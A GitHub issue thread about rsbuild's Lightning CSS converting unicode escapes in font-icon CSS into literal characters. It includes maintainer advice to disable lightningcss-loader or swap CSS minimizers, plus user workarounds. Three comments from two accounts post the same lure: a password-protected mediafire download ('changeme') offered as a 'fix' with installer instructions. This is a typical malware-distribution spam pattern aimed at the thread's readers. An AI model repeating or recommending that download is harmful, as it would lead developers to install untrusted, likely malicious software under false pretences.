### ISSUE TITLE
[Bug]: Unicode Character Transformation in CSS Files

### ISSUE THREAD

**Issue by amirsarfarW** [web-infra-dev/rsbuild#3328]
### Version

```sh
System:
    OS: Windows 10 10.0.19045
    CPU: (12) x64 Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz
    Memory: 8.91 GB / 15.85 GB
  Browsers:
    Edge: Chromium (127.0.2651.74)
    Internet Explorer: 11.0.19041.4355
  npmPackages:
    @rsbuild/core: ^1.0.1-beta.9 => 1.0.1-beta.15
    @rsbuild/plugin-node-polyfill: ^1.0.3 => 1.0.4
    @rsbuild/plugin-react: ^1.0.1-beta.9 => 1.0.1-beta.15
    @rsbuild/plugin-sass: ^1.0.1-beta.9 => 1.0.1-beta.15
    @rsbuild/plugin-svgr: ^1.0.1-beta.9 => 1.0.1-beta.15
```

### Details

I have this issue in font icons

I have this style:

![image](https://github.com/user-attachments/assets/a4b43a0c-56d8-43d3-ab33-7e15d47c8a62)

Rsbuild produces this in dev and prod:

![image](https://github.com/user-attachments/assets/e1b90801-e34a-4fd7-b25a-186aa3962481)

This has some issues when the css file is cached by the browser

Some similar issues:

https://github.com/GoogleChrome/lighthouse/issues/10060

https://github.com/parcel-bundler/lightningcss/issues/310

I have searched a lot and there is no way to prevent rsbuild from transforming unicode to character

### Reproduce link

https://codepen.io/Justineo/pen/yLbxxOR

### Reproduce Steps

Simply create a new project with rsbuild

Have something like this in your css:

```
.icon-users:before {
  content: "\e927";
}
```

then check the outputs in dev and prod:

```
.icon-users:before {
  content: "";
}
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by chenjiahan** [comment]
This is caused by Lightning CSS. In Rsbuild you can disable lightningcss-loader by setting [tools.lightningcssLoader](https://rsbuild.dev/config/tools/lightningcss-loader) to false. You can also use [rsbuild-plugin-css-minimizer](https://github.com/rspack-contrib/rsbuild-plugin-css-minimizer) to switch Lightning CSS to another CSS minimizer.

**Comment by amirsarfarW** [comment]
> This is caused by Lightning CSS. In Rsbuild you can disable lightningcss-loader by setting [tools.lightningcssLoader](https://rsbuild.dev/config/tools/lightningcss-loader) to false. You can also use [rsbuild-plugin-css-minimizer](https://github.com/rspack-contrib/rsbuild-plugin-css-minimizer) to switch Lightning CSS to another CSS minimizer.

Disabling lightningcss fixes the issue in development environment but the issue is present in production build

How can I tell rsbuild to keep characters as they are in production?

**Comment by chenjiahan** [comment]
> You can also use [rsbuild-plugin-css-minimizer](https://github.com/rspack-contrib/rsbuild-plugin-css-minimizer) to switch Lightning CSS to another CSS minimizer.

Use other CSS minimizers

**Comment by sbyps** [comment]
so lightningcss has some bugs while this package can't fix these timely, how can rsbuild improve its QOS when we find some corner case then just wait or turn off lightningcss in our configs? @chenjiahan

**Comment by chenjiahan** [comment]
We will help Lightning CSS fix critical issues.

Considering that Lightning CSS has been adopted by Next.js, Turbopack, Parcel, Rspack, Vite, Rolldown, I believe these issues will be solved.

**Comment by sbyps** [comment]
@amirsarfarW even with unicode character was transformed uncorrectly, but maybe work well? I tested in some mobile(ios 11、chrome39)
![image](https://github.com/user-attachments/assets/8c841f69-9bdf-4ea4-bedb-8f5b56dc0597)

**Comment by amirsarfarW** [comment]
> @amirsarfarW even with unicode character was transformed uncorrectly, but maybe work well? I tested in some mobile(ios 11、chrome39) ![image](https://private-user-images.githubusercontent.com/3881956/363550875-8c841f69-9bdf-4ea4-bedb-8f5b56dc0597.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU4NjU0ODMsIm5iZiI6MTcyNTg2NTE4MywicGF0aCI6Ii8zODgxOTU2LzM2MzU1MDg3NS04Yzg0MWY2OS05YmRmLTRlYTQtYmVkYi04ZjViNTZkYzA1OTcucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkwOSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MDlUMDY1OTQzWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NmE4YzJjZjA5ZmE3ZmI2MTc4ODZhOTIwNTZiYjJkNjE3ZGMyOTE4MWQwOWE5YjU0ZDYxMTRlN2FiNjViMzAyZSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.Xz_VRaGBW31jXv3Wi76VH8OWyEflOxv7cdS3YvGflYg)

if you check 

https://github.com/GoogleChrome/lighthouse/issues/10060

https://github.com/parcel-bundler/lightningcss/issues/310

there is no issue in most cases but when the css is cached by chrome the characters get weird

it is an issue with chome and lightning css and none of them are fixing their issue

**Comment by shiwenna** [comment]
我使用了https://github.com/web-infra-dev/rspack/issues/6057 中提到的解决方案实现打包后css不乱码的。但是经过compression-webpack-plugin压缩为gz或br包后发现content仍然会被解析为不可读字符。所以采用了分开打包相应的css文件同时排除压缩打包后的css文件这种方式来解决这个问题。目前看css的content会正确显示不再被解析为不可读字符，若有更优雅的实现方式欢迎与我交流。

![Image](https://github.com/user-attachments/assets/7a416978-9464-4dae-a6e9-c36c63de4052)
![Image](https://github.com/user-attachments/assets/b4ff88fd-6b14-4f2a-a84b-b3dff8ea1648)
